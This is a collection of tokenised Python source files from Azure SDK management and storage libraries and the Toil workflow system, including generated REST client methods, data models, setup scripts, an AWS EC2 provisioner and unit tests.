header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> body_content = self . _serialize . body ( parameters , '<STR_LIT>' ) <EOL> request = self . _client . post ( url , query_parameters ) <EOL> response = self . _client . send ( <EOL> request , header_parameters , body_content , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> , <NUM_LIT> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . 
get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if response . status_code == <NUM_LIT> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def export_template ( <EOL> self , resource_group_name , deployment_name , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' , pattern = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , deployment_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . post ( url , query_parameters ) <EOL> response = self . _client . send ( request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> ] : <EOL> exp = CloudError ( response ) <EOL> exp . 
request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> deserialized = None <EOL> if response . status_code == <NUM_LIT:200> : <EOL> deserialized = self . _deserialize ( '<STR_LIT>' , response ) <EOL> if raw : <EOL> client_raw_response = ClientRawResponse ( deserialized , response ) <EOL> return client_raw_response <EOL> return deserialized <EOL> def list ( <EOL> self , resource_group_name , filter = None , top = None , custom_headers = { } , raw = False , ** operation_config ) : <EOL> """<STR_LIT>""" <EOL> def internal_paging ( next_link = None , raw = False ) : <EOL> if not next_link : <EOL> url = '<STR_LIT>' <EOL> path_format_arguments = { <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , resource_group_name , '<STR_LIT:str>' ) , <EOL> '<STR_LIT>' : self . _serialize . url ( "<STR_LIT>" , self . config . subscription_id , '<STR_LIT:str>' ) <EOL> } <EOL> url = self . _client . format_url ( url , ** path_format_arguments ) <EOL> query_parameters = { } <EOL> if filter is not None : <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , filter , '<STR_LIT:str>' ) <EOL> if top is not None : <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , top , '<STR_LIT:int>' ) <EOL> query_parameters [ '<STR_LIT>' ] = self . _serialize . query ( "<STR_LIT>" , self . config . api_version , '<STR_LIT:str>' ) <EOL> else : <EOL> url = next_link <EOL> query_parameters = { } <EOL> header_parameters = { } <EOL> header_parameters [ '<STR_LIT:Content-Type>' ] = '<STR_LIT>' <EOL> if self . config . generate_client_request_id : <EOL> header_parameters [ '<STR_LIT>' ] = str ( uuid . uuid1 ( ) ) <EOL> if custom_headers : <EOL> header_parameters . update ( custom_headers ) <EOL> if self . config . accept_language is not None : <EOL> header_parameters [ '<STR_LIT>' ] = self . _serialize . header ( "<STR_LIT>" , self . config . accept_language , '<STR_LIT:str>' ) <EOL> request = self . _client . 
get ( url , query_parameters ) <EOL> response = self . _client . send ( <EOL> request , header_parameters , ** operation_config ) <EOL> if response . status_code not in [ <NUM_LIT:200> ] : <EOL> exp = CloudError ( response ) <EOL> exp . request_id = response . headers . get ( '<STR_LIT>' ) <EOL> raise exp <EOL> return response <EOL> deserialized = models . DeploymentExtendedPaged ( internal_paging , self . _deserialize . dependencies ) <EOL> if raw : <EOL> header_dict = { } <EOL> client_raw_response = models . DeploymentExtendedPaged ( internal_paging , self . _deserialize . dependencies , header_dict ) <EOL> return client_raw_response <EOL> return deserialized </s>
<s> from msrest . serialization import Model <EOL> class HttpRequest ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:body>' : { '<STR_LIT:key>' : '<STR_LIT:body>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , authentication = None , uri = None , method = None , body = None , headers = None ) : <EOL> self . authentication = authentication <EOL> self . uri = uri <EOL> self . method = method <EOL> self . body = body <EOL> self . headers = headers </s>
<s> from msrest . serialization import Model <EOL> class Sku ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , name = None ) : <EOL> self . name = name </s>
<s> from setuptools import setup <EOL> try : <EOL> import azure <EOL> try : <EOL> ver = azure . __version__ <EOL> raise Exception ( <EOL> '<STR_LIT>' . format ( ver ) + <EOL> '<STR_LIT>' <EOL> ) <EOL> except AttributeError : <EOL> pass <EOL> except ImportError : <EOL> pass <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> zip_safe = False , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> from msrest . serialization import Model <EOL> class CorsSettings ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , allowed_origins = None ) : <EOL> self . allowed_origins = allowed_origins </s>
<s> from . resource import Resource <EOL> class HostNameBinding ( Resource ) : <EOL> """<STR_LIT>""" <EOL> _validation = { <EOL> '<STR_LIT:location>' : { '<STR_LIT>' : True } , <EOL> } <EOL> _attribute_map = { <EOL> '<STR_LIT:id>' : { '<STR_LIT:key>' : '<STR_LIT:id>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:location>' : { '<STR_LIT:key>' : '<STR_LIT:location>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT:type>' : { '<STR_LIT:key>' : '<STR_LIT:type>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , location , id = None , name = None , kind = None , type = None , tags = None , host_name_binding_name = None , site_name = None , domain_id = None , azure_resource_name = None , azure_resource_type = None , custom_host_name_dns_record_type = None , host_name_type = None ) : <EOL> super ( HostNameBinding , self ) . __init__ ( id = id , name = name , kind = kind , location = location , type = type , tags = tags ) <EOL> self . host_name_binding_name = host_name_binding_name <EOL> self . 
site_name = site_name <EOL> self . domain_id = domain_id <EOL> self . azure_resource_name = azure_resource_name <EOL> self . azure_resource_type = azure_resource_type <EOL> self . custom_host_name_dns_record_type = custom_host_name_dns_record_type <EOL> self . host_name_type = host_name_type </s>
<s> from msrest . serialization import Model <EOL> class ResourceMetric ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:name>' : { '<STR_LIT:key>' : '<STR_LIT:name>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , name = None , unit = None , time_grain = None , start_time = None , end_time = None , resource_id = None , metric_values = None , properties = None ) : <EOL> self . name = name <EOL> self . unit = unit <EOL> self . time_grain = time_grain <EOL> self . start_time = start_time <EOL> self . end_time = end_time <EOL> self . resource_id = resource_id <EOL> self . metric_values = metric_values <EOL> self . properties = properties </s>
<s> from msrest . serialization import Model <EOL> class SlotConfigNames ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } <EOL> def __init__ ( self , connection_string_names = None , app_setting_names = None ) : <EOL> self . connection_string_names = connection_string_names <EOL> self . app_setting_names = app_setting_names </s>
<s> from msrest . serialization import Model <EOL> class WorkerPoolCollection ( Model ) : <EOL> """<STR_LIT>""" <EOL> _attribute_map = { <EOL> '<STR_LIT:value>' : { '<STR_LIT:key>' : '<STR_LIT:value>' , '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT>' , '<STR_LIT:type>' : '<STR_LIT:str>' } , <EOL> } <EOL> def __init__ ( self , value = None , next_link = None ) : <EOL> self . value = value <EOL> self . next_link = next_link </s>
<s> import unittest <EOL> import azure . mgmt . notificationhubs <EOL> from testutils . common_recordingtestcase import record <EOL> from tests . mgmt_testcase import HttpStatusCode , AzureMgmtTestCase <EOL> class MgmtNotificationHubsTest ( AzureMgmtTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( MgmtNotificationHubsTest , self ) . setUp ( ) <EOL> self . notificationhubs_client = self . create_mgmt_client ( <EOL> azure . mgmt . notificationhubs . NotificationHubsManagementClientConfiguration , <EOL> azure . mgmt . notificationhubs . NotificationHubsManagementClient <EOL> ) <EOL> @ record <EOL> def test_notification_hubs ( self ) : <EOL> self . create_resource_group ( ) <EOL> account_name = self . get_resource_name ( '<STR_LIT>' ) <EOL> output = self . notificationhubs_client . namespaces . check_availability ( <EOL> azure . mgmt . notificationhubs . models . CheckAvailabilityParameters ( <EOL> name = account_name <EOL> ) <EOL> ) <EOL> self . assertTrue ( output . is_availiable ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import base64 <EOL> import sys <EOL> from . _common_models import ( <EOL> _unicode_type , <EOL> ) <EOL> def _encode_base64 ( data ) : <EOL> if isinstance ( data , _unicode_type ) : <EOL> data = data . encode ( '<STR_LIT:utf-8>' ) <EOL> encoded = base64 . b64encode ( data ) <EOL> return encoded . decode ( '<STR_LIT:utf-8>' ) <EOL> def _decode_base64_to_bytes ( data ) : <EOL> if isinstance ( data , _unicode_type ) : <EOL> data = data . encode ( '<STR_LIT:utf-8>' ) <EOL> return base64 . b64decode ( data ) <EOL> def _decode_base64_to_text ( data ) : <EOL> decoded_bytes = _decode_base64_to_bytes ( data ) <EOL> return decoded_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> def _str ( value ) : <EOL> if isinstance ( value , unicode ) : <EOL> return value . encode ( '<STR_LIT:utf-8>' ) <EOL> return str ( value ) <EOL> else : <EOL> _str = str <EOL> def _str_or_none ( value ) : <EOL> if value is None : <EOL> return None <EOL> return _str ( value ) <EOL> def _int_or_none ( value ) : <EOL> if value is None : <EOL> return None <EOL> return str ( int ( value ) ) <EOL> def _bool_or_none ( value ) : <EOL> if value is None : <EOL> return None <EOL> if isinstance ( value , bool ) : <EOL> if value : <EOL> return '<STR_LIT:true>' <EOL> else : <EOL> return '<STR_LIT:false>' <EOL> return str ( value ) <EOL> def _lower ( text ) : <EOL> return text . lower ( ) </s>
<s> from setuptools import setup <EOL> try : <EOL> import azure <EOL> try : <EOL> ver = azure . __version__ <EOL> raise Exception ( <EOL> '<STR_LIT>' . format ( ver ) + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> ) <EOL> except AttributeError : <EOL> pass <EOL> except ImportError : <EOL> pass <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' , '<STR_LIT:r>' ) . read ( ) , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
from azure.common import (
    AzureException,
    AzureHttpError,
)
from ._error import (
    _ERROR_ATTRIBUTE_MISSING,
)


# Raised when client-side validation of a table batch fails.
class AzureBatchValidationError(AzureException):
    '''<STR_LIT>'''


# HTTP-level failure of a single operation inside a batch; carries the
# per-operation error code in addition to the HTTP status.
class AzureBatchOperationError(AzureHttpError):
    '''<STR_LIT>'''

    def __init__(self, message, status_code, batch_code):
        super(AzureBatchOperationError, self).__init__(message, status_code)
        # batch_code: the storage-service error code for this batch entry.
        self.code = batch_code


# A table entity: a dict whose keys are also readable/writable/deletable
# as attributes (entity.Foo <=> entity['Foo']).
class Entity(dict):
    '''<STR_LIT>'''

    def __getattr__(self, name):
        # Missing keys surface as AttributeError so attribute protocol
        # semantics (hasattr etc.) keep working.
        try:
            return self[name]
        except KeyError:
            raise AttributeError(_ERROR_ATTRIBUTE_MISSING.format('<STR_LIT>', name))

    # Attribute assignment writes straight into the dict.
    __setattr__ = dict.__setitem__

    def __delattr__(self, name):
        try:
            del self[name]
        except KeyError:
            raise AttributeError(_ERROR_ATTRIBUTE_MISSING.format('<STR_LIT>', name))

    def __dir__(self):
        # Expose dict methods plus the dynamic keys for introspection.
        return dir({}) + list(self.keys())


# Wrapper pairing an EDM type name with a value, for properties whose type
# cannot be inferred.
class EntityProperty(object):
    '''<STR_LIT>'''

    def __init__(self, type=None, value=None):
        '''<STR_LIT>'''
        self.type = type
        self.value = value


# Minimal marker type for a table returned by list/query operations.
class Table(object):
    '''<STR_LIT>'''
    pass


# OData JSON payload verbosity levels accepted by the table service.
class TablePayloadFormat(object):
    '''<STR_LIT>'''

    JSON_NO_METADATA = '<STR_LIT>'
    '''<STR_LIT>'''

    JSON_MINIMAL_METADATA = '<STR_LIT>'
    '''<STR_LIT>'''

    JSON_FULL_METADATA = '<STR_LIT>'
    '''<STR_LIT>'''


# EDM (Entity Data Model) property type names used on the wire.
class EdmType(object):
    '''<STR_LIT>'''

    BINARY = '<STR_LIT>'
    '''<STR_LIT>'''

    INT64 = '<STR_LIT>'
    '''<STR_LIT>'''

    GUID = '<STR_LIT>'
    '''<STR_LIT>'''

    DATETIME = '<STR_LIT>'
    '''<STR_LIT>'''

    STRING = '<STR_LIT>'
    '''<STR_LIT>'''

    INT32 = '<STR_LIT>'
    '''<STR_LIT>'''

    DOUBLE = '<STR_LIT>'
    '''<STR_LIT>'''

    BOOLEAN = '<STR_LIT>'
    '''<STR_LIT>'''


# Composable permission set for table SAS; individual flags OR together and
# round-trip through the compact string form via ``_str``.
class TablePermissions(object):
    '''<STR_LIT>'''

    def __init__(self, query=False, add=False, update=False, delete=False, _str=None):
        '''<STR_LIT>'''
        if not _str:
            _str = '<STR_LIT>'
        # Each flag is set either explicitly or by its letter appearing in
        # the serialized permission string.
        self.query = query or ('<STR_LIT:r>' in _str)
        self.add = add or ('<STR_LIT:a>' in _str)
        self.update = update or ('<STR_LIT:u>' in _str)
        self.delete = delete or ('<STR_LIT:d>' in _str)

    def __or__(self, other):
        # Union of permissions: concatenated strings re-parse into flags.
        return TablePermissions(_str=str(self) + str(other))

    def __add__(self, other):
        return TablePermissions(_str=str(self) + str(other))

    def __str__(self):
        # Canonical letter-per-flag serialization, fixed order r/a/u/d.
        return (('<STR_LIT:r>' if self.query else '<STR_LIT>') +
                ('<STR_LIT:a>' if self.add else '<STR_LIT>') +
                ('<STR_LIT:u>' if self.update else '<STR_LIT>') +
                ('<STR_LIT:d>' if self.delete else '<STR_LIT>'))


# Predefined single-flag instances for convenient composition.
TablePermissions.QUERY = TablePermissions(query=True)
TablePermissions.ADD = TablePermissions(add=True)
TablePermissions.UPDATE = TablePermissions(update=True)
TablePermissions.DELETE = TablePermissions(delete=True)
from __future__ import absolute_import
from collections import namedtuple

# Lightweight record describing one running task (field names masked in
# this corpus).
TaskData = namedtuple('<STR_LIT>', (
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>'))


class ResourceRequirement(namedtuple('<STR_LIT>', (
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>'))):
    # Immutable triple of resource amounts for a job.

    def size(self):
        """<STR_LIT>"""
        # NOTE(review): only ``cores`` contributes to the reported size;
        # the other two fields are ignored here -- confirm intentional.
        return self.cores


# Full job description handed to the scheduler; seven masked fields.
ToilJob = namedtuple('<STR_LIT>', (
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>',
    '<STR_LIT>'))
<s> import logging <EOL> import re <EOL> import time <EOL> from collections import Iterable <EOL> from urllib2 import urlopen <EOL> import boto . ec2 <EOL> from bd2k . util import memoize <EOL> from bd2k . util . iterables import concat <EOL> from boto . ec2 . instance import Instance <EOL> from cgcloud . lib . ec2 import wait_for_spot_instances , ec2_instance_types , wait_transition <EOL> from cgcloud . lib . util import papply <EOL> from toil . batchSystems . abstractBatchSystem import AbstractScalableBatchSystem , AbstractBatchSystem <EOL> from toil . common import Config <EOL> from toil . provisioners . abstractProvisioner import AbstractProvisioner , Shape <EOL> log = logging . getLogger ( __name__ ) <EOL> def switch ( false , true ) : <EOL> return { False : false , True : true } <EOL> class AWSProvisioner ( AbstractProvisioner ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , config , batchSystem ) : <EOL> """<STR_LIT>""" <EOL> super ( AWSProvisioner , self ) . __init__ ( ) <EOL> self . batchSystem = batchSystem <EOL> ami , instanceType = '<STR_LIT::>' . split ( config . nodeOptions ) <EOL> preemptableAmi , preemptableInstanceType = '<STR_LIT::>' . split ( config . preemptableNodeOptions ) <EOL> self . ami = switch ( ami , preemptableAmi ) <EOL> self . instanceType = switch ( instanceType , preemptableInstanceType ) <EOL> for instanceType in self . instanceType . values ( ) : <EOL> try : <EOL> instanceType = ec2_instance_types [ instanceType ] <EOL> except KeyError : <EOL> raise RuntimeError ( "<STR_LIT>" % instanceType ) <EOL> else : <EOL> if instanceType . disks == <NUM_LIT:0> : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % instanceType . name ) <EOL> self . spotBid = config . preemptableBidPrice <EOL> def addNodes ( self , numNodes = <NUM_LIT:1> , preemptable = False ) : <EOL> instanceSpec = dict ( image_id = self . ami [ preemptable ] , <EOL> key_name = self . _keyName , <EOL> user_data = self . 
_userData ( ) , <EOL> instance_type = self . instanceType [ preemptable ] , <EOL> instance_profile_arn = self . _instanceProfileArn ( ) , <EOL> security_group_ids = self . _securityGroupIds , <EOL> ebs_optimized = self . ebsOptimized , <EOL> dry_run = False ) <EOL> if preemptable : <EOL> requests = self . _ec2 . request_spot_instances ( price = self . spotBid , <EOL> count = numNodes , <EOL> placement = self . _availabilityZone ( ) , <EOL> placement_group = None , <EOL> launch_group = None , <EOL> availability_zone_group = None , <EOL> ** instanceSpec ) <EOL> instances = wait_for_spot_instances ( self . _ec2 , requests ) <EOL> else : <EOL> reservation = self . _ec2 . run_instances ( min_count = numNodes , <EOL> max_count = numNodes , <EOL> ** instanceSpec ) <EOL> instances = reservation . instances <EOL> def wait_running ( instance ) : <EOL> wait_transition ( instance , from_states = { '<STR_LIT>' } , to_state = '<STR_LIT>' ) <EOL> assert len ( instances ) == numNodes <EOL> papply ( wait_running , instances ) <EOL> if isinstance ( self . batchSystem , AbstractScalableBatchSystem ) : <EOL> while instances : <EOL> numNodes = self . batchSystem . getNodes ( ) <EOL> for address in numNodes . keys ( ) : <EOL> instances . remove ( address ) <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> def removeNodes ( self , numNodes = <NUM_LIT:1> , preemptable = False ) : <EOL> instances = self . _getAllInstances ( ) <EOL> if isinstance ( self . batchSystem , AbstractScalableBatchSystem ) : <EOL> instances = { instance . private_ip_address : instance for instance in instances } <EOL> nodeLoad = self . batchSystem . getNodes ( preemptable ) <EOL> nodes = [ ( nodeAddress , instances . get ( nodeAddress ) , nodeInfo ) <EOL> for nodeAddress , nodeInfo in nodeLoad . iteritems ( ) ] <EOL> def by_load_and_youth ( ( nodeAddress , instance , nodeInfo ) ) : <EOL> return nodeInfo . workers , nodeInfo . cores , instance . launchTime if instance else <NUM_LIT:0> <EOL> nodes . 
sort ( key = by_load_and_youth ) <EOL> else : <EOL> nodes = [ ( instance . private_ip_address , instance , None ) for instance in instances ] <EOL> def by_youth ( ( nodeAddress , instance , nodeInfo ) ) : <EOL> return instance . launch_time , nodeAddress <EOL> nodes . sort ( key = by_youth ) <EOL> assert numNodes <= len ( nodes ) <EOL> nodes = nodes [ : numNodes ] <EOL> instanceIds = [ instance . id for nodeAddress , instance , nodeInfo in nodes ] <EOL> self . _ec2 . terminate_instances ( instance_ids = instanceIds ) <EOL> def getNumberOfNodes ( self , preemptable = False ) : <EOL> instanceIds = { instance . id for instance in self . _getAllInstances ( ) } <EOL> assert self . _instanceId in instanceIds <EOL> return len ( instanceIds ) - <NUM_LIT:1> <EOL> def getNodeShape ( self , preemptable = False ) : <EOL> instanceType = ec2_instance_types [ self . instanceType [ preemptable ] ] <EOL> return Shape ( wallTime = <NUM_LIT> * <NUM_LIT> , <EOL> memory = instanceType . memory , <EOL> cores = instanceType . cores , <EOL> disk = instanceType . disks * instanceType . disk_capacity ) <EOL> def _getAllInstances ( self ) : <EOL> """<STR_LIT>""" <EOL> reservations = self . _ec2 . get_all_reservations ( filters = { <EOL> '<STR_LIT>' : self . _instanceId , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return concat ( r . instances for r in reservations ) <EOL> @ classmethod <EOL> def _instanceData ( cls , path ) : <EOL> return urlopen ( '<STR_LIT>' + path ) . read ( ) <EOL> @ classmethod <EOL> def _metaData ( cls , path ) : <EOL> return cls . _instanceData ( '<STR_LIT>' + path ) <EOL> @ classmethod <EOL> def _userData ( cls ) : <EOL> user_data = cls . _instanceData ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" , user_data ) <EOL> return user_data <EOL> @ property <EOL> @ memoize <EOL> def _nodeIP ( self ) : <EOL> ip = self . _metaData ( '<STR_LIT>' ) <EOL> log . 
info ( "<STR_LIT>" , ip ) <EOL> return ip <EOL> @ property <EOL> @ memoize <EOL> def _instanceId ( self ) : <EOL> instance_id = self . _metaData ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" , instance_id ) <EOL> return instance_id <EOL> @ property <EOL> @ memoize <EOL> def _availabilityZone ( self ) : <EOL> zone = self . _metaData ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" , zone ) <EOL> return zone <EOL> @ property <EOL> @ memoize <EOL> def _region ( self ) : <EOL> m = re . match ( r'<STR_LIT>' , self . _availabilityZone ) <EOL> assert m <EOL> region = m . group ( <NUM_LIT:1> ) <EOL> log . info ( "<STR_LIT>" , region ) <EOL> return region <EOL> @ property <EOL> @ memoize <EOL> def _ec2 ( self ) : <EOL> return boto . ec2 . connect_to_region ( self . _region ) <EOL> @ property <EOL> @ memoize <EOL> def _keyName ( self ) : <EOL> return self . _instance . key_name <EOL> @ property <EOL> @ memoize <EOL> def _instance ( self ) : <EOL> return self . _getInstance ( self . _instanceId ) <EOL> @ property <EOL> @ memoize <EOL> def _securityGroupIds ( self ) : <EOL> return [ sg . id for sg in self . _instance . groups ] <EOL> @ property <EOL> @ memoize <EOL> def _instanceProfileArn ( self ) : <EOL> return self . _instance . instance_profile . arn <EOL> def _getInstance ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> reservations = self . _ec2 . get_all_reservations ( instance_ids = [ instance_id ] ) <EOL> instances = ( i for r in reservations for i in r . instances if i . id == instance_id ) <EOL> instance = next ( instances ) <EOL> assert next ( instances , None ) is None <EOL> return instance <EOL> @ property <EOL> @ memoize <EOL> def ebsOptimized ( self ) : <EOL> return self . _instance . ebs_optimized </s>
from __future__ import absolute_import
from toil.common import Toil, ToilContextManagerMisuseException
from toil.job import Job
from toil.test import ToilTest


class ToilContextManagerTest(ToilTest):
    # Verifies that Toil enforces use as a context manager.

    def testContextManger(self):
        # Happy path: starting a workflow inside `with Toil(...)` works.
        options = Job.Runner.getDefaultOptions(self._getTestJobStorePath())
        options.logLevel = '<STR_LIT>'
        with Toil(options) as toil:
            toil.start(HelloWorld())

    def testNoContextManger(self):
        # Calling start() without entering the context manager must raise.
        options = Job.Runner.getDefaultOptions(self._getTestJobStorePath())
        options.logLevel = '<STR_LIT>'
        toil = Toil(options)
        self.assertRaises(ToilContextManagerMisuseException, toil.start, HelloWorld())


class HelloWorld(Job):
    # Root job: spawns a child that writes a file, then a follow-on that
    # reads it back.

    def __init__(self):
